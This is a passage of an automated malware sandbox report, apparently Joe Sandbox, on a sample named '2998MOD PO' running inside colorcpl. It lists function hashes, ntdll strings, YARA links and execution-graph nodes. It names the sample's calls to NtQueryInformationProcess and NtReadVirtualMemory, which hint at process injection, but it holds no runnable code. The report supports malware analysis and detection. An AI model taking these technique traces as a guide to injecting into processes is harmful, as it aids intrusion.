                          • Opcode Fuzzy Hash: 953463aa8426ab639d947011d556c450230c414061c132c9c34230c439d2c9ca
                          • Instruction Fuzzy Hash: FA90022524556102D150715C44086168059B7E0201F55C021E0854594EC55589556322
                          Function 019C3D10 Relevance: .0, Instructions: 4COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9a5271f6422a9d94af58dbaa6213cd41ad1c01b50796aab968106f36c57b835a
                          • Instruction ID: 01fdd57595e83267e69f51b90bff95307d1789cdac22f672514e2e6832691dfb
                          • Opcode Fuzzy Hash: 9a5271f6422a9d94af58dbaa6213cd41ad1c01b50796aab968106f36c57b835a
                          • Instruction Fuzzy Hash: C990023520251142954072585808A4E815997E1302B95D415E0055554DC91489615322
                          Function 019C3D70 Relevance: .0, Instructions: 4COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 896f4235c17a9b0b065a49fba3298da3a0f7ce7bc24b774b078c3c55ebeaa7fc
                          • Instruction ID: 5862521e1e696b6547f30c069e261b9582636753c802726e28f66ac63d0e35d8
                          • Opcode Fuzzy Hash: 896f4235c17a9b0b065a49fba3298da3a0f7ce7bc24b774b078c3c55ebeaa7fc
                          • Instruction Fuzzy Hash: F890023920151402D51071585808646409A97D0301F55D411E0464558EC65489A1A222
                          Function 019C2C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                          • Instruction ID: 43c683df09aab794adfa1a4cb48f3dea64bd3df98f4f26d5149249ec5ab77c83
                          • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                          • Instruction Fuzzy Hash:
                          Function 019C2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID: ___swprintf_l
                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                          • API String ID: 48624451-2108815105
                          • Opcode ID: 750b29e9f796593513e87181a2ef6e481d7003ff89699457f0d3a34adc6f25e7
                          • Instruction ID: 88b81df4f083abb3a59027d6bce9cf9f09ca10dfc85352901496947e2cfd0788
                          • Opcode Fuzzy Hash: 750b29e9f796593513e87181a2ef6e481d7003ff89699457f0d3a34adc6f25e7
                          • Instruction Fuzzy Hash: A751D5B6A00116BFDB11DF9CC99097EFBB8BB48641B14C12DE5ADD7642D334DE4087A1
                          Function 01A32410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID: ___swprintf_l
                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                          • API String ID: 48624451-2108815105
                          • Opcode ID: 412fabc5fd88aa06171e8c8381db3097629ab641ebbd460282b8a06aeadb5dbe
                          • Instruction ID: 6d7c355f271fbb55c870e50670343388c1e47359b26237fb9defcf8c56ca5680
                          • Opcode Fuzzy Hash: 412fabc5fd88aa06171e8c8381db3097629ab641ebbd460282b8a06aeadb5dbe
                          • Instruction Fuzzy Hash: B051C675A00645AEDB30DF6DC890B7EB7F9EFC4200B44846AF59AD7682D674EB408760
                          Function 019B7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                          Download Yara Rule
                          Strings
                          • Execute=1, xrefs: 019F4713
                          • ExecuteOptions, xrefs: 019F46A0
                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 019F4742
                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 019F4725
                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 019F46FC
                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 019F4655
                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 019F4787
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                          • API String ID: 0-484625025
                          • Opcode ID: ff31e65fd3fde41987eeb40892b9208fe3cc532ce089db043e452eae360bcf5d
                          • Instruction ID: 47048274a5cdbb71085f260ada55b99ffa0f97f27bf531e215e7e6fc89041843
                          • Opcode Fuzzy Hash: ff31e65fd3fde41987eeb40892b9208fe3cc532ce089db043e452eae360bcf5d
                          • Instruction Fuzzy Hash: 57512A31A00209BBEF25AAE8DDD5FEA77ACAF98705F0401ADD60DA71C0D7719A418F51
                          Function 019CB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID: __aulldvrm
                          • String ID: +$-$0$0
                          • API String ID: 1302938615-699404926
                          • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                          • Instruction ID: b79bb41730009d6e01d013d65c12ee40121c3f794b83503849f32002282d8b69
                          • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                          • Instruction Fuzzy Hash: 8381D130E012498EEF258E6CC9527FEBBB9AF44BA1F18451DD8DAA7691C73489408B53
                          Function 01A320E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID: ___swprintf_l
                          • String ID: %%%u$[$]:%u
                          • API String ID: 48624451-2819853543
                          • Opcode ID: 1061001805b15bfe0b21ed785cd8d0cf549c037d0afdf24c677fa59ba6df808d
                          • Instruction ID: 29d74b0174f0cd1429b1bddfd925a9e9079457d355e0e328b590e98ee0c5c06b
                          • Opcode Fuzzy Hash: 1061001805b15bfe0b21ed785cd8d0cf549c037d0afdf24c677fa59ba6df808d
                          • Instruction Fuzzy Hash: 0321337AE00219ABDB21DF69DD45BEEBBF8AF94654F44011AFA45D3200E7309A018BA1
                          Function 019AF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                          Download Yara Rule
                          Strings
                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 019F02BD
                          • RTL: Re-Waiting, xrefs: 019F031E
                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 019F02E7
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                          • API String ID: 0-2474120054
                          • Opcode ID: 8fe2342affef2c003bf74bc9cadcf95c8f399093a53056448347cd7dc02890af
                          • Instruction ID: 677dcfa0c51f10ecabb1c3bce3c072e1ee30d6c4e543997549c59f6141a64756
                          • Opcode Fuzzy Hash: 8fe2342affef2c003bf74bc9cadcf95c8f399093a53056448347cd7dc02890af
                          • Instruction Fuzzy Hash: 0EE1C0306047419FD725CF28C884B6ABBE9FF84314F540A1DF6A98B2D2D774D949CB92
                          Function 019BBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                          Download Yara Rule
                          Strings
                          • RTL: Resource at %p, xrefs: 019F7B8E
                          • RTL: Re-Waiting, xrefs: 019F7BAC
                          • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 019F7B7F
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                          • API String ID: 0-871070163
                          • Opcode ID: 2699cd45453befed7d32db18bd41f5751ce1fc174abd4d2cec5e848caca3e702
                          • Instruction ID: d3cb9b452140f0640487381e44fc6ddd1dbb88e42b9ac093ba2dc9d3d8f1970b
                          • Opcode Fuzzy Hash: 2699cd45453befed7d32db18bd41f5751ce1fc174abd4d2cec5e848caca3e702
                          • Instruction Fuzzy Hash: 2141E2317047069FD725DE29C980BAAB7E9EF89712F100A1DEA9E972C0DB31E4058B91
                          Function 019BB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                          Download Yara Rule
                          APIs
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 019F728C
                          Strings
                          • RTL: Resource at %p, xrefs: 019F72A3
                          • RTL: Re-Waiting, xrefs: 019F72C1
                          • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 019F7294
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                          • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                          • API String ID: 885266447-605551621
                          • Opcode ID: a888906cd25324403ba86b47d495ca0e756f7dbb9de503bc915b9a22d564cb7b
                          • Instruction ID: 4cd878bf12a340f73a437c2286dd86f6b38fc3316dd55271c13fa47a76b36b13
                          • Opcode Fuzzy Hash: a888906cd25324403ba86b47d495ca0e756f7dbb9de503bc915b9a22d564cb7b
                          • Instruction Fuzzy Hash: FB410535700206AFD725DE69CD81FAAB7A5FB94B11F10061DFA5DA7280DB30F80187D1
                          Function 01A32300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID: ___swprintf_l
                          • String ID: %%%u$]:%u
                          • API String ID: 48624451-3050659472
                          • Opcode ID: 08d8b75e3fe844d5a6863b39d74966cc3a8e4ee48fe1ca8d3c3ad0edea444779
                          • Instruction ID: 51c7de5e13b80ad942da8c04dd988989c21c78d2ed55df0107fe6d9a038632a4
                          • Opcode Fuzzy Hash: 08d8b75e3fe844d5a6863b39d74966cc3a8e4ee48fe1ca8d3c3ad0edea444779
                          • Instruction Fuzzy Hash: 12317876A006199FDB20DF2DDC40BEE77F8EF94610F44455AF949E3240EB30AA458FA1
                          Function 019C7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID: __aulldvrm
                          • String ID: +$-
                          • API String ID: 1302938615-2137968064
                          • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                          • Instruction ID: d355c86e44232ad6e700b0e34ea7aedb8d74ec84295209b4a83760a71eb4fbca
                          • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                          • Instruction Fuzzy Hash: FF91A871E002179BDB28DFADC881ABE7BA9AF44B21F54451EE9DDE72D0D73099408F12
                          Function 01989126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID: $$@
                          • API String ID: 0-1194432280
                          • Opcode ID: 029dde6fe45c6aa00350963ab254fa03b7c1f1cb707497ee9d0ac29dcdb44b11
                          • Instruction ID: e324a18db8258259025b44936df03bd34e3b36c1d39e75ea0d1eb3e0e936334f
                          • Opcode Fuzzy Hash: 029dde6fe45c6aa00350963ab254fa03b7c1f1cb707497ee9d0ac29dcdb44b11
                          • Instruction Fuzzy Hash: 2E811B75D002699BDB32DB54CC44BEEB7B8BB48714F0041EAAA1DB7640D7709E85CFA0

                          Execution Graph

                          Execution Coverage:0.5%
                          Dynamic/Decrypted Code Coverage:100%
                          Signature Coverage:0%
                          Total number of Nodes:29
                          Total number of Limit Nodes:1
                          execution_graph 85138 4b4ef7e 85139 4b4efad 85138->85139 85140 4b4f129 NtQueryInformationProcess 85139->85140 85143 4b4f19c 85139->85143 85141 4b4f163 85140->85141 85142 4b4f241 NtReadVirtualMemory 85141->85142 85141->85143 85142->85143 85146 4cf2c00 85148 4cf2c0a 85146->85148 85149 4cf2c1f LdrInitializeThunk 85148->85149 85150 4cf2c11 85148->85150 85152 4cf2ad0 LdrInitializeThunk 85154 4d66a30 85156 4d66a69 85154->85156 85155 4d66a6d 85178 4cf4c30 12 API calls __startOneArgErrorHandling 85155->85178 85156->85155 85158 4d66a9a 85156->85158 85172 4cf4650 LdrInitializeThunk 85156->85172 85158->85155 85173 4cf39b0 LdrInitializeThunk 85158->85173 85160 4d66be8 85162 4d66ab9 85163 4d66ac3 85162->85163 85164 4d66ade 85162->85164 85163->85155 85175 4cf2fb0 LdrInitializeThunk 85163->85175 85166 4d66b1f 85164->85166 85167 4d66b3a __vswprintf 85164->85167 85166->85155 85176 4cf2fb0 LdrInitializeThunk 85166->85176 85170 4d66bcb 85167->85170 85174 4cf4340 LdrInitializeThunk 85167->85174 85170->85155 85177 4cf2fb0 LdrInitializeThunk 85170->85177 85172->85158 85173->85162 85174->85170 85175->85155 85176->85155 85177->85155 85178->85160

                          Executed Functions

                          Function 04B4EF7E Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 548nativeCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 0 4b4ef7e-4b4efab 1 4b4efad-4b4efc4 call 4b512a8 0->1 2 4b4efc9-4b4efe8 call 4b512c8 call 4b4cfd8 0->2 1->2 8 4b4efee-4b4f0fa call 4b4eeb8 call 4b512c8 call 4b55234 call 4b40398 call 4b50878 call 4b40398 call 4b50878 call 4b52f98 2->8 9 4b4f5e8-4b4f5f3 2->9 26 4b4f100-4b4f19a call 4b40398 call 4b50878 NtQueryInformationProcess call 4b512c8 call 4b40398 call 4b50878 8->26 27 4b4f5dc-4b4f5e3 call 4b4eeb8 8->27 39 4b4f19c-4b4f1a9 26->39 40 4b4f1ae-4b4f22a call 4b55242 call 4b40398 call 4b50878 26->40 27->9 39->27 40->39 49 4b4f230-4b4f23f call 4b5526c 40->49 52 4b4f241-4b4f282 NtReadVirtualMemory call 4b51fb8 49->52 53 4b4f28c-4b4f2d2 call 4b40398 call 4b50878 call 4b538f8 49->53 56 4b4f287 52->56 62 4b4f2d4-4b4f2ec 53->62 63 4b4f2f1-4b4f3ed call 4b40398 call 4b50878 call 4b5527a call 4b40398 call 4b50878 call 4b532b8 call 4b51278 * 3 call 4b5526c 53->63 56->27 62->27 86 4b4f420-4b4f438 call 4b5526c 63->86 87 4b4f3ef-4b4f41e call 4b5526c call 4b51278 call 4b552ce call 4b55288 63->87 92 4b4f464-4b4f476 call 4b51ef8 86->92 93 4b4f43a-4b4f45f call 4b52a68 86->93 98 4b4f47b-4b4f485 87->98 92->98 93->92 100 4b4f553-4b4f5bc call 4b40398 call 4b50878 call 4b53c18 98->100 101 4b4f48b-4b4f4db call 4b40398 call 4b50878 call 4b535d8 call 4b5526c 98->101 100->27 127 4b4f5be-4b4f5d7 call 4b512a8 100->127 120 4b4f510-4b4f517 101->120 121 4b4f4dd-4b4f506 call 4b55318 call 4b552ce 101->121 124 4b4f523-4b4f52e 120->124 125 4b4f519-4b4f521 call 4b5526c 120->125 121->120 124->100 129 4b4f530-4b4f54e call 4b53f38 124->129 125->100 125->124 127->27 129->100
                          APIs
                          • NtQueryInformationProcess.NTDLL ref: 04B4F148
                          • NtReadVirtualMemory.NTDLL ref: 04B4F25C
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.2288786271.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_4b40000_colorcpl.jbxd
                          Similarity
                          • API ID: InformationMemoryProcessQueryReadVirtual
                          • String ID: 0$Z6t\
                          • API String ID: 1498878907-740423683
                          • Opcode ID: 39ded49adacb4dc03804fb794de1f49505a5d0c8d49dd09b654f5c8ae226f251
                          • Instruction ID: 3bfd6635e0c260abf2d7cbd45952a54759e398a87d1bf98302a2616c7602f69a
                          • Opcode Fuzzy Hash: 39ded49adacb4dc03804fb794de1f49505a5d0c8d49dd09b654f5c8ae226f251
                          • Instruction Fuzzy Hash: D7125E70918A8C8FDF65EF68C8947EEB7E1FB98309F00466AD84AC7254DF35E2419B41
                          Function 04CF4650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000008.00000002.2288885160.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true
                          • Associated: 00000008.00000002.2288885160.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000008.00000002.2288885160.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000008.00000002.2288885160.0000000004E1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_4c80000_colorcpl.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 9338fff6bbab0d0121aca3bf17a1c3e09b3fbaca42df775423f75628c4a4574c
                          • Instruction ID: 75c4c8be30af3fd9eedae8b07f969f15484f8a7aa4588b17aed3189e42120532
                          • Opcode Fuzzy Hash: 9338fff6bbab0d0121aca3bf17a1c3e09b3fbaca42df775423f75628c4a4574c
                          • Instruction Fuzzy Hash: EB9002616019008262407158480450660159BE1305395C115B05557B4C8618D955A269
                          Function 04CF4340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000008.00000002.2288885160.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true
                          • Associated: 00000008.00000002.2288885160.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000008.00000002.2288885160.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000008.00000002.2288885160.0000000004E1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_4c80000_colorcpl.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 1081b15ea2fc32f21d7f43b7e77e204ed858f7daff02b037dc2a5b67d785a70d
                          • Instruction ID: 191f1f049571008351a4b4f970fd9caa928da620104a1f738bc2f5cc4a4faebc
                          • Opcode Fuzzy Hash: 1081b15ea2fc32f21d7f43b7e77e204ed858f7daff02b037dc2a5b67d785a70d
                          • Instruction Fuzzy Hash: B4900231605C0052B2407158488464640159BE0305B55C011F04257A8C8A14DA566361
                          Function 04CF2CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 147 4cf2ca0-4cf2cac LdrInitializeThunk
                          APIs
                          Memory Dump Source
                          • Source File: 00000008.00000002.2288885160.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true
                          • Associated: 00000008.00000002.2288885160.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000008.00000002.2288885160.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000008.00000002.2288885160.0000000004E1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_4c80000_colorcpl.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: cad2d157d1e6751325728a876b3668651be609e39b53e6a139b29ad03fdbc03c
                          • Instruction ID: a67d49f40ae3f42f97ffba35c4a9def4120cb421ec5f41292fc8c4e6cc315b92
                          • Opcode Fuzzy Hash: cad2d157d1e6751325728a876b3668651be609e39b53e6a139b29ad03fdbc03c
                          • Instruction Fuzzy Hash: C990023120180442F2007598540874600158BE0305F55D011B50257A9EC665D9917131
                          Function 04CF2C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 145 4cf2c60-4cf2c6c LdrInitializeThunk
                          APIs
                          Memory Dump Source
                          • Source File: 00000008.00000002.2288885160.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true
                          • Associated: 00000008.00000002.2288885160.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000008.00000002.2288885160.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000008.00000002.2288885160.0000000004E1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_4c80000_colorcpl.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 2ab842d349ae8b8a43137ab9275d7c417e2b2b760d76e8b23284f4db3380a0f2
                          • Instruction ID: c055f587a261cca64786cce60e3dcd10e79e1cc27a1b3b9b3538ff6e1709690f
                          • Opcode Fuzzy Hash: 2ab842d349ae8b8a43137ab9275d7c417e2b2b760d76e8b23284f4db3380a0f2
                          • Instruction Fuzzy Hash: 6990023120180882F20071584404B4600158BE0305F55C016B01257A8D8615D9517521
                          Function 04CF2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 146 4cf2c70-4cf2c7c LdrInitializeThunk
                          APIs
                          Memory Dump Source
                          • Source File: 00000008.00000002.2288885160.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true
                          • Associated: 00000008.00000002.2288885160.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000008.00000002.2288885160.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000008.00000002.2288885160.0000000004E1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_4c80000_colorcpl.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: bbc464c21b4cd3648ea77b298b3ca4f0b80f08f719b598ab34adf3c18724a8ba
                          • Instruction ID: 7c1ff31da75bf5a1b50863846ff4422f2f829655e4c32a5572f9b884211ed1c8
                          • Opcode Fuzzy Hash: bbc464c21b4cd3648ea77b298b3ca4f0b80f08f719b598ab34adf3c18724a8ba
                          • Instruction Fuzzy Hash: 9190023120188842F2107158840474A00158BD0305F59C411B44257ACD8695D9917121
                          Function 04CF2DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 150 4cf2dd0-4cf2ddc LdrInitializeThunk
                          APIs
                          Memory Dump Source
                          • Source File: 00000008.00000002.2288885160.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true
                          • Associated: 00000008.00000002.2288885160.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000008.00000002.2288885160.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000008.00000002.2288885160.0000000004E1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_4c80000_colorcpl.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 0a032b3e4837fc6d833bd9b533a4f55eeccac268f222c76bfd161b7b7eff1977
                          • Instruction ID: bb2964115a2e787e35826c85e7a4a4764fa18c15c7a36337023d552f67ccb3ca
                          • Opcode Fuzzy Hash: 0a032b3e4837fc6d833bd9b533a4f55eeccac268f222c76bfd161b7b7eff1977
                          • Instruction Fuzzy Hash: AD900221242841927645B158440460740169BE0245795C012B1415BA4C8526E956E621
                          Function 04CF2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 151 4cf2df0-4cf2dfc LdrInitializeThunk
                          APIs
                          Memory Dump Source
                          • Source File: 00000008.00000002.2288885160.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true
                          • Associated: 00000008.00000002.2288885160.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000008.00000002.2288885160.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000008.00000002.2288885160.0000000004E1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_4c80000_colorcpl.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: a597123cd0e3da110d7f68d87f38e574099e444e4850e96774553ad89d860c19
                          • Instruction ID: db5f5c0730b142495de8a17d0598306b3e0507acb4d745df603ed244ba82a1d5
                          • Opcode Fuzzy Hash: a597123cd0e3da110d7f68d87f38e574099e444e4850e96774553ad89d860c19
                          • Instruction Fuzzy Hash: E790023120180453F2117158450470700198BD0245F95C412B04257ACD9656DA52B121
                          Function 04CF2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 148 4cf2d10-4cf2d1c LdrInitializeThunk
